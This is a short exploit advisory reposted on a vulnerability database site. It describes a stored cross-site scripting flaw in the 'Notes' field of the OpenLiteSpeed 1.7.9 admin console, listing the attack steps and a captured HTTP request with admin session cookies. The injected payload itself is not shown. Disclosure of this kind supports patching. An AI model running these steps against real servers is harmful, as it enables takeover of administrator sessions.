Tuesday, March 30, 2021

Openlitespeed 1.7.9 Cross Site Scripting

# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
# Date: 3/30/2021
# Exploit Author: cmOs
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.9
# Tested on Ubuntu 20.04

Step 1: Log in to the dashboard using the Administrator account
Step 2: Go to Listeners > Summary > Actions (View) > Edit
Step 3: Inject XSS_Payload to "Notes" parameter
Step 4: Graceful Restart
Step 5: Trigger XSS when Administrator click on Default Icon


POST /view/confMgr.php HTTP/1.1
Connection: close
Content-Length: 163
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;



Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore